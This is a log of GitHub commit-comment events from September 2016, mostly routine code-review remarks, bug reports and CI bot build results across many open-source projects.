{"id":"4586516876","type":"CommitCommentEvent","actor":{"login":"tzerrell"},"repo":{"name":"MoreEventsMod/More_Events_Mod_Beta"},"payload":{"comment":{"id":19087374,"position":null,"line":null,"path":null,"commit_id":"f23c3ce953701bbbe9610a329c854df35937d251","created_at":"2016-09-19T23:14:10Z","updated_at":"2016-09-19T23:14:10Z","body":"This is the commit causing the `[trigger_impl.cpp:905]: Error in scripted trigger, cannot find: ethos"}},"created_at":"2016-09-19T23:14:10Z"}
{"id":"4586518636","type":"CommitCommentEvent","actor":{"login":"safaael"},"repo":{"name":"LPA2-Automne2016/cours"},"payload":{"comment":{"id":19087378,"position":null,"line":null,"path":null,"commit_id":"5fcfe7ba8977bf7caf4a3ea2fa56a95529668e2d","created_at":"2016-09-19T23:14:39Z","updated_at":"2016-09-19T23:14:39Z","body":"modification "}},"created_at":"2016-09-19T23:14:39Z"}
{"id":"4586518914","type":"CommitCommentEvent","actor":{"login":"mikepauer"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":19087382,"position":null,"line":null,"path":null,"commit_id":"396aff71da19b6b8d844e555f13a218f9c7938bc","created_at":"2016-09-19T23:14:44Z","updated_at":"2016-09-19T23:14:44Z","body":"Just a small code pointer, tremove is very inefficient compared to nil and letting garbage collector handle it, especially when iterating large tables. It's comparing a function call to a variable set."}},"created_at":"2016-09-19T23:14:44Z"}
{"id":"4586535380","type":"CommitCommentEvent","actor":{"login":"vmesel"},"repo":{"name":"ericlavigne/gomoku"},"payload":{"comment":{"id":19087426,"position":null,"line":null,"path":null,"commit_id":"18e1e6d74dc752047e3e3952a0365e5921e6dd09","created_at":"2016-09-19T23:19:21Z","updated_at":"2016-09-19T23:19:21Z","body":"Hey Eric! How is this project going? I'm in need to help some open source project, can I try to help you guys out?"}},"created_at":"2016-09-19T23:19:21Z"}
{"id":"4586539351","type":"CommitCommentEvent","actor":{"login":"kylehamilton"},"repo":{"name":"nicolezelinsky/MAVIS"},"payload":{"comment":{"id":19087440,"position":null,"line":null,"path":null,"commit_id":"c017ed746f8e3eba8fc051d621da884091162f5a","created_at":"2016-09-19T23:20:27Z","updated_at":"2016-09-19T23:20:27Z","body":"?"}},"created_at":"2016-09-19T23:20:27Z"}
{"id":"4586540435","type":"CommitCommentEvent","actor":{"login":"tillig"},"repo":{"name":"dotnetjunkie/Mvc"},"payload":{"comment":{"id":19087447,"position":26,"line":26,"path":"src/Microsoft.AspNetCore.Mvc/ApplicationBuilderExtensions.cs","commit_id":"89957e06349ddc3a45977ff19c18d7087ebc6503","created_at":"2016-09-19T23:20:46Z","updated_at":"2016-09-19T23:20:46Z","body":"What is the use case for getting a request-level service provider from the application builder?"}},"created_at":"2016-09-19T23:20:46Z"}
{"id":"4586542597","type":"CommitCommentEvent","actor":{"login":"Lovethelovely18"},"repo":{"name":"alexitosrv/at"},"payload":{"comment":{"id":19087455,"position":null,"line":null,"path":null,"commit_id":"c2f161d2c8c6a0755f97c1be7e380c9335c89ceb","created_at":"2016-09-19T23:21:19Z","updated_at":"2016-09-19T23:21:19Z","body":"We're you able to solve ?"}},"created_at":"2016-09-19T23:21:19Z"}
{"id":"4586544463","type":"CommitCommentEvent","actor":{"login":"sweetdl"},"repo":{"name":"jinjic/AlwaysEducation"},"payload":{"comment":{"id":19087459,"position":null,"line":null,"path":null,"commit_id":"62f57c4c09f84f073f6befe95554a04084b98e19","created_at":"2016-09-19T23:21:51Z","updated_at":"2016-09-19T23:21:51Z","body":"Too much green. DNR"}},"created_at":"2016-09-19T23:21:51Z"}
{"id":"4586546804","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19087468,"position":null,"line":null,"path":null,"commit_id":"00421f20cd8ea3727e2d13d4a7428d370b67c7a8","created_at":"2016-09-19T23:22:34Z","updated_at":"2016-09-19T23:22:34Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1193 of 1193 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00421f20cd8ea3727e2d13d4a7428d370b67c7a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00421f20cd8ea3727e2d13d4a7428d370b67c7a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00421f20cd8ea3727e2d13d4a7428d370b67c7a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.12%25-green.svg)</a>\n"}},"created_at":"2016-09-19T23:22:34Z"}
{"id":"4586548447","type":"CommitCommentEvent","actor":{"login":"pyk"},"repo":{"name":"salestock/fastText.py"},"payload":{"comment":{"id":19087474,"position":null,"line":null,"path":null,"commit_id":"fc1de74812f4cd726ee21d3775c5bd71c402eb9d","created_at":"2016-09-19T23:23:04Z","updated_at":"2016-09-19T23:23:04Z","body":"> because I noticed that they are sorted by frequency\r\n\r\nCorrect. It would be great if we have some kind of ordered set without sacrificing the check performance (since we do this a lot) and the order of words. Any ideas?\r\n\r\nThis [OrderedSet](http://stackoverflow.com/a/1653974/3376568) might what we need. But I haven't benchmark against the plain `set` yet"}},"created_at":"2016-09-19T23:23:04Z"}
{"id":"4586551705","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"lodash/lodash.com"},"payload":{"comment":{"id":19087484,"position":null,"line":null,"path":null,"commit_id":"48eba9f3ac0d7d959aba12decb930521d7644de4","created_at":"2016-09-19T23:24:01Z","updated_at":"2016-09-19T23:24:01Z","body":"They work :heart:! \\cc @thejameskyle"}},"created_at":"2016-09-19T23:24:01Z"}
{"id":"4586552541","type":"CommitCommentEvent","actor":{"login":"robcore"},"repo":{"name":"robcore/machinex"},"payload":{"comment":{"id":19087486,"position":null,"line":null,"path":null,"commit_id":"a704f73ecde50566ae6c8bcd54242de3905ef906","created_at":"2016-09-19T23:24:17Z","updated_at":"2016-09-19T23:24:17Z","body":"Hey man,\r\nSorry I know my commits are a mess (if you know how to cherry-pick without borking a repo, i'd be ever grateful for a brief pointer in the right direction).\r\n\r\nThe latest (and best) version of this has the CLK_GEAR overclocked to 10, and the ROOT_FREQ overclocked to 22.  With the standard OC you see in this patch, I experienced subtle yet significant syncing issues between audio and video when testing with youtube, videoplayers, etc.  They were sporadic and unpredictable, and would often see video lagging behind audio significantly."}},"created_at":"2016-09-19T23:24:17Z"}
{"id":"4586560026","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19087502,"position":null,"line":null,"path":null,"commit_id":"6422ecfbeb04f2574ab3fbf45a84a024682ec77f","created_at":"2016-09-19T23:26:24Z","updated_at":"2016-09-19T23:26:24Z","body":"Thanks to Raphael Straub and MacPorts for suggesting we incorporate the `#define CRYPTOPP_UNUSED(x) ((void)(x))` change."}},"created_at":"2016-09-19T23:26:24Z"}
{"id":"4586560878","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"lodash/lodash.com"},"payload":{"comment":{"id":19087504,"position":null,"line":null,"path":null,"commit_id":"48eba9f3ac0d7d959aba12decb930521d7644de4","created_at":"2016-09-19T23:26:37Z","updated_at":"2016-09-19T23:26:37Z","body":"*(ps I've now removed this test commit)*"}},"created_at":"2016-09-19T23:26:37Z"}
{"id":"4586565745","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19087513,"position":null,"line":null,"path":null,"commit_id":"c4f2df348cba89714f23e0c1bfcf8d28d22db490","created_at":"2016-09-19T23:28:01Z","updated_at":"2016-09-19T23:28:01Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#eJG7EhZrSAmrKo801E3VdA"}},"created_at":"2016-09-19T23:28:01Z"}
{"id":"4586570802","type":"CommitCommentEvent","actor":{"login":"nikswamy"},"repo":{"name":"FStarLang/FStar"},"payload":{"comment":{"id":19087523,"position":31,"line":305,"path":"examples/low-level/crypto/Crypto.Symmetric.Poly1305.fst","commit_id":"91c49b1b45502fe796c3da6940fe927383f97fd8","created_at":"2016-09-19T23:29:29Z","updated_at":"2016-09-19T23:29:29Z","body":"cool that this worked! : )"}},"created_at":"2016-09-19T23:29:29Z"}
{"id":"4586571216","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19087526,"position":null,"line":null,"path":null,"commit_id":"7d06fd62dd20655961730cfe4f1ea83adf26061c","created_at":"2016-09-19T23:29:36Z","updated_at":"2016-09-19T23:29:36Z","body":"It doesn't matter, if the file is missing then the context for the file is not settled in updater script, and even if I set the context in rild directory doesn't work, when files are copied context must be set again... I have an idea, tomorrow I will take a look if works.. "}},"created_at":"2016-09-19T23:29:36Z"}
{"id":"4586576729","type":"CommitCommentEvent","actor":{"login":"mranostay"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19087537,"position":53,"line":638,"path":"drivers/power/bq24190_charger.c","commit_id":"ac0bfdd447201b1951744b7ac9b522de625c950c","created_at":"2016-09-19T23:31:11Z","updated_at":"2016-09-19T23:31:11Z","body":"Problem here is that bq24190_charger_get_property can be called from an non-interrupt context... likely not what we want to do"}},"created_at":"2016-09-19T23:31:11Z"}
{"id":"4586580530","type":"CommitCommentEvent","actor":{"login":"shmick"},"repo":{"name":"MatthewVance/nginx-build"},"payload":{"comment":{"id":19087550,"position":null,"line":null,"path":null,"commit_id":"2cd439db9296a04bcdf3c18071c44700916eac33","created_at":"2016-09-19T23:32:18Z","updated_at":"2016-09-19T23:32:18Z","body":"Looks like enable-ec_nistp_64_gcc_128 breaks things on RasPi. Should check the output of '''gcc -dM -E - </dev/null | grep __SIZEOF_INT128__''' to ensure that it can be enabled"}},"created_at":"2016-09-19T23:32:18Z"}
{"id":"4586587619","type":"CommitCommentEvent","actor":{"login":"tillig"},"repo":{"name":"dotnetjunkie/Mvc"},"payload":{"comment":{"id":19087574,"position":56,"line":56,"path":"src/Microsoft.AspNetCore.Mvc/ApplicationBuilderExtensions.cs","commit_id":"89957e06349ddc3a45977ff19c18d7087ebc6503","created_at":"2016-09-19T23:34:22Z","updated_at":"2016-09-19T23:34:22Z","body":"If you did provide a delegate to get request services from the application, should it always be a required service?"}},"created_at":"2016-09-19T23:34:22Z"}
{"id":"4586588086","type":"CommitCommentEvent","actor":{"login":"icomrade"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19087577,"position":null,"line":null,"path":null,"commit_id":"fe9b8fdcb4b5cf069e0cc287b97785a3448817c8","created_at":"2016-09-19T23:34:31Z","updated_at":"2016-09-19T23:34:31Z","body":"I don't see why the object would fail to spawn if the inventory isn't update to the array format.  I'm not sure if doing this in MySQL is realistic or worthwhile since this is a working solution in SQF and there are other solutions discussed above as well."}},"created_at":"2016-09-19T23:34:31Z"}
{"id":"4586588819","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"felixonmars/EnergyPlus"},"payload":{"comment":{"id":19087581,"position":null,"line":null,"path":null,"commit_id":"bfaf45db4e0cffc4d85384499dc19286faf82e15","created_at":"2016-09-19T23:34:44Z","updated_at":"2016-09-19T23:34:44Z","body":"patch-1 (felixonmars) - Win64-Windows-7-VisualStudio-12: OK (2338 of 2338 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfaf45db4e0cffc4d85384499dc19286faf82e15-PR5865-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfaf45db4e0cffc4d85384499dc19286faf82e15-PR5865-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-19T23:34:44Z"}
{"id":"4586591004","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19087587,"position":null,"line":null,"path":null,"commit_id":"fe9b8fdcb4b5cf069e0cc287b97785a3448817c8","created_at":"2016-09-19T23:35:18Z","updated_at":"2016-09-19T23:35:18Z","body":"It will spawn fine because server_monitor only does a setVariable. It doesn't care what type the data is.\r\n\r\nActually @icomrade we can make it handle both types. The only change needed is on this line:\r\nhttps://github.com/EpochModTeam/DayZ-Epoch/blob/master/SQF/dayz_code/actions/doorManagement/doorGetFriends.sqf#L6\r\nhttps://github.com/EpochModTeam/DayZ-Epoch/blob/master/SQF/dayz_code/actions/plotManagement/plotGetFriends.sqf#L8\r\nReplace with:\r\n```sqf\r\nlbAdd [7002, if (typeName (_x select 1) == \"STRING\") then { _x select 1 } else { toString (_x select 1) }];\r\n```\r\nAddFriend.sqf only uses the UID to check if it is already in the list, so it will work fine in either format. Sorry I didn't notice that earlier."}},"created_at":"2016-09-19T23:35:18Z"}
{"id":"4586591330","type":"CommitCommentEvent","actor":{"login":"CHENShuang1994"},"repo":{"name":"CHENShuang1994/LogisticRegression"},"payload":{"comment":{"id":19087588,"position":273,"line":null,"path":"main.py","commit_id":"6d1f6eef2fea76f7f9f1896a0ebac7eaeac6305e","created_at":"2016-09-19T23:35:24Z","updated_at":"2016-09-19T23:35:24Z","body":"true label confidence instead of true label"}},"created_at":"2016-09-19T23:35:24Z"}
{"id":"4586592442","type":"CommitCommentEvent","actor":{"login":"destijl"},"repo":{"name":"google/grr"},"payload":{"comment":{"id":19087593,"position":null,"line":null,"path":null,"commit_id":"bb7f38080ef77f94c437cd2ca009df5741222650","created_at":"2016-09-19T23:35:46Z","updated_at":"2016-09-19T23:35:46Z","body":"@scudette I accidentally pushed this straight to the main repo, rather than via PR. Please review :)"}},"created_at":"2016-09-19T23:35:46Z"}
{"id":"4586594252","type":"CommitCommentEvent","actor":{"login":"rad8329"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19087599,"position":42,"line":480,"path":"framework/web/View.php","commit_id":"fd6dd73cec3e7a35855c9d088f839581a9e09ace","created_at":"2016-09-19T23:36:17Z","updated_at":"2016-09-19T23:36:17Z","body":"Hello, this line has a side effect. Sometimes the pathUrl must begin with a single slash, and this prevent it. Example:  shared media path  for http://example.com/(frontend) - http://example.com/backend(backend) then, media path wil be http://example.com/media/"}},"created_at":"2016-09-19T23:36:17Z"}
{"id":"4586596103","type":"CommitCommentEvent","actor":{"login":"courtsimas"},"repo":{"name":"ovenbits/Alexandria"},"payload":{"comment":{"id":19087605,"position":null,"line":null,"path":null,"commit_id":"e4d297d9a8b75553567ceb48becf8b5eb8b2cef3","created_at":"2016-09-19T23:36:49Z","updated_at":"2016-09-19T23:36:49Z","body":"Way to be man. Way to be. "}},"created_at":"2016-09-19T23:36:49Z"}
{"id":"4586596369","type":"CommitCommentEvent","actor":{"login":"darq-"},"repo":{"name":"qteam-github/RepTest"},"payload":{"comment":{"id":19087607,"position":null,"line":null,"path":null,"commit_id":"d909cb59f0a306de1a00e2846bcb1134272c5e95","created_at":"2016-09-19T23:36:54Z","updated_at":"2016-09-19T23:36:54Z","body":"Test"}},"created_at":"2016-09-19T23:36:54Z"}
{"id":"4586598420","type":"CommitCommentEvent","actor":{"login":"CHENShuang1994"},"repo":{"name":"CHENShuang1994/LogisticRegression"},"payload":{"comment":{"id":19087616,"position":294,"line":null,"path":"main.py","commit_id":"6d1f6eef2fea76f7f9f1896a0ebac7eaeac6305e","created_at":"2016-09-19T23:37:28Z","updated_at":"2016-09-19T23:37:28Z","body":"splition 4"}},"created_at":"2016-09-19T23:37:28Z"}
{"id":"4586600774","type":"CommitCommentEvent","actor":{"login":"tillig"},"repo":{"name":"dotnetjunkie/Mvc"},"payload":{"comment":{"id":19087622,"position":63,"line":63,"path":"src/Microsoft.AspNetCore.Mvc/ApplicationBuilderExtensions.cs","commit_id":"89957e06349ddc3a45977ff19c18d7087ebc6503","created_at":"2016-09-19T23:38:10Z","updated_at":"2016-09-19T23:38:10Z","body":"This looks potentially generally helpful but not necessarily required for DI support."}},"created_at":"2016-09-19T23:38:10Z"}
{"id":"4586601136","type":"CommitCommentEvent","actor":{"login":"tillig"},"repo":{"name":"dotnetjunkie/Mvc"},"payload":{"comment":{"id":19087623,"position":81,"line":81,"path":"src/Microsoft.AspNetCore.Mvc/ApplicationBuilderExtensions.cs","commit_id":"89957e06349ddc3a45977ff19c18d7087ebc6503","created_at":"2016-09-19T23:38:17Z","updated_at":"2016-09-19T23:38:17Z","body":"This looks potentially generally helpful but not necessarily required for DI support."}},"created_at":"2016-09-19T23:38:17Z"}
{"id":"4586603056","type":"CommitCommentEvent","actor":{"login":"ngraymon"},"repo":{"name":"ckwatson/kernel"},"payload":{"comment":{"id":19087629,"position":null,"line":null,"path":null,"commit_id":"2e395041bef74835e0519bec94df2848176029ff","created_at":"2016-09-19T23:38:51Z","updated_at":"2016-09-19T23:38:51Z","body":"I believe this *fixes* #8"}},"created_at":"2016-09-19T23:38:51Z"}
{"id":"4586603326","type":"CommitCommentEvent","actor":{"login":"gmkurtzer"},"repo":{"name":"singularityware/singularity"},"payload":{"comment":{"id":19087630,"position":null,"line":null,"path":null,"commit_id":"0a834404b69ef62bb51b866549eca90e3d3e1b12","created_at":"2016-09-19T23:38:56Z","updated_at":"2016-09-19T23:38:56Z","body":"Looks good to me!"}},"created_at":"2016-09-19T23:38:56Z"}
{"id":"4586604090","type":"CommitCommentEvent","actor":{"login":"Pakistan-1"},"repo":{"name":"FGMEMBERS/777"},"payload":{"comment":{"id":19087631,"position":null,"line":null,"path":null,"commit_id":"f4ba04e4c162c045005225470c7f768f169ba5ee","created_at":"2016-09-19T23:39:09Z","updated_at":"2016-09-19T23:39:09Z","body":"Thanks\n\n\n\nOn 20 Sep 2016, at 4:01 AM, FGDATA <notifications@github.com<mailto:notifications@github.com>> wrote:\n\n\nVERY VERY PRETTY!!\n\n-\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub<https://github.com/FGMEMBERS/777/commit/f4ba04e4c162c045005225470c7f768f169ba5ee#commitcomment-19084748>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AKxVa0pTM3_CbVegFHhLLFGnDR0LUakJks5qruovgaJpZM4KA5vf>.\n"}},"created_at":"2016-09-19T23:39:09Z"}
{"id":"4586606558","type":"CommitCommentEvent","actor":{"login":"xiangli1993"},"repo":{"name":"xiangli1993/BU_EC601_A2_HW1"},"payload":{"comment":{"id":19087640,"position":null,"line":null,"path":null,"commit_id":"960c11b969554efdebadbce259ee8c474c2a02e2","created_at":"2016-09-19T23:39:54Z","updated_at":"2016-09-19T23:39:54Z","body":"This pic is left for test"}},"created_at":"2016-09-19T23:39:54Z"}
{"id":"4586608874","type":"CommitCommentEvent","actor":{"login":"Grz3s"},"repo":{"name":"ACID-Scripts/WOTLK"},"payload":{"comment":{"id":19087648,"position":19,"line":18586,"path":"acid_wotlk.sql","commit_id":"057287c88464f47f0e0eacb5902ac0b0ded108d0","created_at":"2016-09-19T23:40:36Z","updated_at":"2016-09-19T23:40:36Z","body":":+1: "}},"created_at":"2016-09-19T23:40:36Z"}
{"id":"4586609465","type":"CommitCommentEvent","actor":{"login":"patrickelectric"},"repo":{"name":"KDE/atcore"},"payload":{"comment":{"id":19087650,"position":14,"line":125,"path":"testclient/mainwindow.cpp","commit_id":"f1b19037bfc117a903fbba44d13deac4c4c80281","created_at":"2016-09-19T23:40:48Z","updated_at":"2016-09-19T23:40:48Z","body":"Style corrections in other commit "}},"created_at":"2016-09-19T23:40:48Z"}
{"id":"4586609475","type":"CommitCommentEvent","actor":{"login":"Grz3s"},"repo":{"name":"ACID-Scripts/WOTLK"},"payload":{"comment":{"id":19087652,"position":31,"line":18639,"path":"acid_wotlk.sql","commit_id":"057287c88464f47f0e0eacb5902ac0b0ded108d0","created_at":"2016-09-19T23:40:48Z","updated_at":"2016-09-19T23:40:48Z","body":":+1: "}},"created_at":"2016-09-19T23:40:48Z"}
{"id":"4586610351","type":"CommitCommentEvent","actor":{"login":"patspam"},"repo":{"name":"material-foundation/material-text-accessibility-ios"},"payload":{"comment":{"id":19087653,"position":null,"line":null,"path":null,"commit_id":"83c2cbe624728415d63250803b7ddaff5b8ef012","created_at":"2016-09-19T23:41:05Z","updated_at":"2016-09-19T23:41:05Z","body":"Thanks Adrian!"}},"created_at":"2016-09-19T23:41:05Z"}
{"id":"4586610539","type":"CommitCommentEvent","actor":{"login":"patrickelectric"},"repo":{"name":"KDE/atcore"},"payload":{"comment":{"id":19087655,"position":6,"line":101,"path":"testclient/mainwindow.cpp","commit_id":"f1b19037bfc117a903fbba44d13deac4c4c80281","created_at":"2016-09-19T23:41:07Z","updated_at":"2016-09-19T23:41:07Z","body":"Style corrections in other commit "}},"created_at":"2016-09-19T23:41:07Z"}
{"id":"4586611715","type":"CommitCommentEvent","actor":{"login":"Matt-Kobzik"},"repo":{"name":"Matt-Kobzik/zero"},"payload":{"comment":{"id":19087659,"position":null,"line":null,"path":null,"commit_id":"6468d804e8ff99bbb6e26e89ef20957eb0ad9716","created_at":"2016-09-19T23:41:27Z","updated_at":"2016-09-19T23:41:27Z","body":"@coldpour can you remind me how you added a ReadMe.md file?"}},"created_at":"2016-09-19T23:41:27Z"}
{"id":"4586616460","type":"CommitCommentEvent","actor":{"login":"icomrade"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19087667,"position":null,"line":null,"path":null,"commit_id":"fe9b8fdcb4b5cf069e0cc287b97785a3448817c8","created_at":"2016-09-19T23:42:55Z","updated_at":"2016-09-19T23:42:55Z","body":"I didn't think it would be able to support both types either but I never really thought about it. I'll revert this commit then you can commit your changes."}},"created_at":"2016-09-19T23:42:55Z"}
{"id":"4586616969","type":"CommitCommentEvent","actor":{"login":"scudette"},"repo":{"name":"google/grr"},"payload":{"comment":{"id":19087669,"position":null,"line":null,"path":null,"commit_id":"bb7f38080ef77f94c437cd2ca009df5741222650","created_at":"2016-09-19T23:43:05Z","updated_at":"2016-09-19T23:43:05Z","body":"LGTM"}},"created_at":"2016-09-19T23:43:05Z"}
{"id":"4586617271","type":"CommitCommentEvent","actor":{"login":"cadehaley"},"repo":{"name":"cadehaley/VR_Assn2_WebGraphics"},"payload":{"comment":{"id":19087671,"position":null,"line":null,"path":null,"commit_id":"ee64888f4b5f3c961f4f6c26d165eb3f325319f6","created_at":"2016-09-19T23:43:11Z","updated_at":"2016-09-19T23:43:11Z","body":"Turning this up will cause a spiral of death"}},"created_at":"2016-09-19T23:43:11Z"}
{"id":"4586620671","type":"CommitCommentEvent","actor":{"login":"networkimprov"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19087676,"position":53,"line":638,"path":"drivers/power/bq24190_charger.c","commit_id":"ac0bfdd447201b1951744b7ac9b522de625c950c","created_at":"2016-09-19T23:44:10Z","updated_at":"2016-09-19T23:44:10Z","body":"It's called from userspace. That is why we use _irqsave/restore here, to prevent irq_handle_thread() from deadlocking.\r\n\r\nbq24190_sysfs_show/store() can read this register instead of its cached value, but that's a special case for expert users."}},"created_at":"2016-09-19T23:44:10Z"}
{"id":"4586625933","type":"CommitCommentEvent","actor":{"login":"AMD-NICK"},"repo":{"name":"SuperiorServers/plib_v2"},"payload":{"comment":{"id":19087689,"position":38,"line":162,"path":"lua/plib/extensions/math.lua","commit_id":"cf7d300b5fd423e72b6574fd00df010ae811f171","created_at":"2016-09-19T23:45:45Z","updated_at":"2016-09-19T23:45:45Z","body":"what is this for?"}},"created_at":"2016-09-19T23:45:45Z"}
{"id":"4586631831","type":"CommitCommentEvent","actor":{"login":"vini9"},"repo":{"name":"greentechhobby/SpaceVectorPWM_Arduino"},"payload":{"comment":{"id":19087702,"position":null,"line":null,"path":null,"commit_id":"07d87a726e3a1728b63a658973ea2e9cf539bf25","created_at":"2016-09-19T23:47:36Z","updated_at":"2016-09-19T23:47:36Z","body":"\r\nGood evening.\r\n\r\nI'm working with a work based on SVPWM , but could not code your code to arduino deviso the FastSin.h template library because lacks the .CPP file.\r\nIf you can help me would be very grateful.\r\n\r\nVinicius Granemann\r\nBrazil , Caçador- SC"}},"created_at":"2016-09-19T23:47:36Z"}
{"id":"4586635748","type":"CommitCommentEvent","actor":{"login":"Atcold"},"repo":{"name":"jhjin/triplet-criterion"},"payload":{"comment":{"id":19087717,"position":3,"line":3,"path":"TripletCriterion.cu","commit_id":"5323f705ada9265e709ca68d2caedba7cd398282","created_at":"2016-09-19T23:48:49Z","updated_at":"2016-09-19T23:48:49Z","body":"Ouch, I forgot to remove this line. It's curious that it compiled anyways... @jhjin, do you know why? "}},"created_at":"2016-09-19T23:48:49Z"}
{"id":"4586637100","type":"CommitCommentEvent","actor":{"login":"tillig"},"repo":{"name":"dotnetjunkie/Mvc"},"payload":{"comment":{"id":19087720,"position":29,"line":29,"path":"src/Microsoft.AspNetCore.Mvc/UseExtensions.cs","commit_id":"89957e06349ddc3a45977ff19c18d7087ebc6503","created_at":"2016-09-19T23:49:14Z","updated_at":"2016-09-19T23:49:14Z","body":"I assume this is intended to be a different way to create and dispose request lifetime scopes?"}},"created_at":"2016-09-19T23:49:14Z"}
{"id":"4586639923","type":"CommitCommentEvent","actor":{"login":"akaplo"},"repo":{"name":"umts/pvta-multiplatform"},"payload":{"comment":{"id":19087723,"position":25,"line":49,"path":"www/pages/plan-trip/plan-trip-controller.js","commit_id":"9abaebe37ce4161a0401bdf50a7b0ad6e0262f39","created_at":"2016-09-19T23:50:09Z","updated_at":"2016-09-19T23:50:09Z","body":"Good catch."}},"created_at":"2016-09-19T23:50:09Z"}
{"id":"4586642498","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19087732,"position":null,"line":null,"path":null,"commit_id":"6413fdfbdb70bc0659b53a50fde9e9f18b20f57e","created_at":"2016-09-19T23:50:57Z","updated_at":"2016-09-19T23:50:57Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#UD-99fFER3GEo6wzsT0HzA"}},"created_at":"2016-09-19T23:50:57Z"}
{"id":"4586646945","type":"CommitCommentEvent","actor":{"login":"hugol1ma"},"repo":{"name":"hugol1ma/command-autocomplete"},"payload":{"comment":{"id":19087742,"position":null,"line":null,"path":null,"commit_id":"51962d3100fd465041f7da82e507341208d04f91","created_at":"2016-09-19T23:52:25Z","updated_at":"2016-09-19T23:52:25Z","body":"Change file name to evict overwrite the original .bashrc on linux"}},"created_at":"2016-09-19T23:52:25Z"}
{"id":"4586651757","type":"CommitCommentEvent","actor":{"login":"tylerstraub"},"repo":{"name":"home-assistant/home-assistant"},"payload":{"comment":{"id":19087756,"position":null,"line":null,"path":null,"commit_id":"e7f9fdca67675fc6ced54b334985c0fb76951034","created_at":"2016-09-19T23:53:58Z","updated_at":"2016-09-19T23:53:58Z","body":"Started receiving error output on the recorder service as well after most recent rebase. \r\n\r\nTried clearing my database and starting fresh but the issue resurfaced. I had to un-comment the history and logbook service entirely to get the errors to stop appearing. \r\n\r\n```\r\n16-09-19 16:43:02 homeassistant.components.recorder: Ended unfinished session (id=3 from 2016-09-19 23:38:47.615936)\r\n16-09-19 16:43:02 homeassistant.components.recorder: Found unfinished sessions\r\n```"}},"created_at":"2016-09-19T23:53:58Z"}
{"id":"4586655781","type":"CommitCommentEvent","actor":{"login":"mezz"},"repo":{"name":"ForestryMC/ForestryMC"},"payload":{"comment":{"id":19087773,"position":null,"line":null,"path":null,"commit_id":"b2b743398c356f583efc9a6eed6b845e17211ebe","created_at":"2016-09-19T23:55:10Z","updated_at":"2016-09-19T23:55:10Z","body":"Is this like the Analyzer block, which shows the item being worked on?\r\nOr is it like the Carpenter, which shows the \"Craft Preview\"?"}},"created_at":"2016-09-19T23:55:10Z"}
{"id":"4586660233","type":"CommitCommentEvent","actor":{"login":"Calrama"},"repo":{"name":"Calrama/zfs"},"payload":{"comment":{"id":19087792,"position":7,"line":42,"path":"contrib/dracut/90zfs/module-setup.sh.in","commit_id":"e4cb5bc462c68bbc0b666b69d06d1e2f4dcb1f19","created_at":"2016-09-19T23:56:23Z","updated_at":"2016-09-19T23:56:23Z","body":"Done, thanks."}},"created_at":"2016-09-19T23:56:23Z"}
{"id":"4586662210","type":"CommitCommentEvent","actor":{"login":"ajjl"},"repo":{"name":"ajjl/compiler"},"payload":{"comment":{"id":19087800,"position":null,"line":null,"path":null,"commit_id":"39fa7e07ccf478af0cbb47eb74b17a536f0c458e","created_at":"2016-09-19T23:56:54Z","updated_at":"2016-09-19T23:56:54Z","body":"closes #8 "}},"created_at":"2016-09-19T23:56:54Z"}
